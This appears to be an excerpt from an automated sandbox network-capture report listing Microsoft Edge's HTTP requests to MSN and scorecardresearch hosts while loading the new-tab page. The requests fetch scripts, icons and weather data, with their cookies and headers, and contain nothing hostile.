Source: global traffic HTTP traffic detected: GET /b2?rn=1737661217429&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=36CB6A348F62672B3E3A7F498E00663A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1D65c52f93929c7a844caee1737661219; XID=1D65c52f93929c7a844caee1737661219
Source: global traffic HTTP traffic detected: GET /service/news/feed/pages/weblayout?User=m-36CB6A348F62672B3E3A7F498E00663A&activityId=3A35C6D9-C75F-44F1-A696-E1F20ED10EDD&adminDisabled=false&adoffsets=c1:-1,c2:-1,c3:-1&adsTimeout=600&apikey=0QfOX3Vn51YCzitbLaRkTTBadtWpgTN8NZLW0C1SEM&audienceMode=adult&backgroundImageIsSet=false&cm=en-us&colstatus=c1:0,c2:0,c3:0&column=c3&colwidth=300&cookieWallPresent=false&dhp=1&disablecontent=true&inEdgeFeatures=false&it=app&l3v=2&layout=c3&memory=8&mobile=false&newsSkip=0&newsTop=48&ocid=anaheim-ntp-feeds&pgc=547&revertTimes=0&scn=APP_ANON&timeOut=1000&vpSize=1232x876&wposchema=byregion HTTP/1.1Host: assets.msn.comConnection: keep-aliveads-referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"OneSvc-Uni-Feat-Tun: EdgeInterestTier1Ids:null;LoginState:NA;Product:anaheim;PageName:default;PageType:dhp;OCID:msedgdhp;ViewPortWidth:1280;ViewPortHeight:984;sec-ch-ua-mobile: ?0taboola-sessionId: initUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/background-gallery.ca616469ff36f5744808.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1737661217428&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=3a35c6d9c75f44f1a696e1f20ed10edd&activityId=3a35c6d9c75f44f1a696e1f20ed10edd&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=D9667FD42A7C4264B9BD8B71E5B83A72&MUID=36CB6A348F62672B3E3A7F498E00663A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; SM=T; _C_ETH=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/toast-wc.7856acab3c9f6f3af2bf.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/waffle-wc.5e95a6e8b96055fbd144.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/card-actions-wc.2e0b8bb8c51bf53bcad3.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-segments.f68ee5aa19f6973c90eb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/d3-library.3d830fc6f0392332c923.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/cs-core-desktop_card-components_dist_card-banner_index_js-cs-core-desktop_card-components_dis-389dd7.6716c93e27d7e156d3e5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/channel-data-connector.b857251407e592f709ce.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_weather-shared-wc_dist_weather-card_index_js-libs_weather-skycode-mapping-svgr_dist_SkyC-851a44.0b2e04a6db31fd8116de.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/channel-store.01ae09ee4eb1e37ccd19.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/welcomeGreetingLight.c096cf224eef0c6fdab2.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-settings-edgenext.da6c246e4c4e1ecb1b37.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/sign-in-control-wc.367cab6cb9bb41af1876.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_location-service_dist_AutoSuggestService_index_js-libs_location-service_dist_profiles_We-e648aa.e53e905b38f230baccdd.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-card-data-connector.e2f4ce38bbe0723c1fcf.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/codex-bing-chat.6e25fe85c86c209cb04f.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/MarketMismatchCoachMark.383c94a7f98d2806de2d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/common/icons/copilot_color.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-sports-lib.3072cfffd436683e04b9.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.json HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/float-button-group-wc.a178620524f626faaa26.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/feedback.aaa33c6ca151df54bcca.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/scrollPerfMetricTrackers.0c056f3a2106f33fad55.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-windows-widget-shared.293d4dd273a8bc2b7194.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/segments/recoitems/weather?apikey=UhJ4G66OjyLbn9mXARgajXLiLw6V75sHnfpU60aJBB&activityId=3A35C6D9-C75F-44F1-A696-E1F20ED10EDD&ocid=weather-peregrine&cm=en-us&it=app&user=m-36CB6A348F62672B3E3A7F498E00663A&scn=APP_ANON&appId=4de6fc9f-3262-47bf-9c99-e189a8234fa2&wrapodata=false&includemapsmetadata=true&cuthour=true&filterRule=card&distanceinkm=0&regionDataCount=20&orderby=distance&days=5&pageOcid=anaheim-dhp-peregrine&source=undefined_csr&hours=13&fdhead=prg-1sw-wxnhcolk%2Cprg-1sw-wxomghd%2Cprg-1s-wxtrendv3&contentcount=3&region=us&market=en-us&locale=en-us HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nurturing-coach-mark.e0a347064ee12e08d080.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nurturing-placement-manager.22770b41d6c1d2bc6531.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/SunnyDayV3.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/digest-card.5fe6cd7db56d38e3fbc9.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_ad-service_dist_NativeAdService_js.be817f1621a33c798f12.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_ad-service-base_dist_msnKVService_js-libs_ads-constants_dist_template-configs_infopane_D-a5042d.2a8a605c0e73e437d940.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
